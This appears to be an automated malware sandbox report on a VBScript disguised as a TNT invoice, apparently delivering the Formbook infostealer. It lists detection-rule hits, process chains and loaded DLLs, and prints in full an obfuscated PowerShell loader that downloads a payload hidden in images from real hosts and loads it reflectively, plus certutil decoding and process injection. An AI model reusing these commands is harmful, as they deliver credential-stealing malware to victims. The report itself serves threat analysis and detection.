Source: 0000000C.00000002.3371183272.0000000003150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2452322622.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.3370938043.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2468777900.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2683501602.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2616, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5804, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.spre.troj.spyw.expl.evad.winVBS@18/8@4/4
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\z0DWX[1].txt Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1424:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2528:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2ymxetr.jg1.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNT Invoicing_pdf.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SyncHost.exe, 0000000D.00000003.2628001164.00000000027E3000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2627389766.0000000002819000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2682656755.0000000002819000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2627561379.00000000027E3000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2682656755.00000000027E3000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2628001164.0000000002819000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: TNT Invoicing_pdf.vbs ReversingLabs: Detection: 13%
Source: TNT Invoicing_pdf.vbs Virustotal: Detection: 10%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNT Invoicing_pdf.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -decode "" "C:\Users\user\AppData\Local\DesktopPic\WallP.exe"
Source: C:\Windows\System32\certutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c dir /b *.png *.jpg *.bmp *.gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Process created: C:\Windows\SysWOW64\SyncHost.exe "C:\Windows\SysWOW64\SyncHost.exe"
Source: C:\Windows\SysWOW64\SyncHost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -decode "" "C:\Users\user\AppData\Local\DesktopPic\WallP.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c dir /b *.png *.jpg *.bmp *.gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Process created: C:\Windows\SysWOW64\SyncHost.exe "C:\Windows\SysWOW64\SyncHost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wiaaut.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wiatrace.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: certcli.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: version.dll Jump to behavior
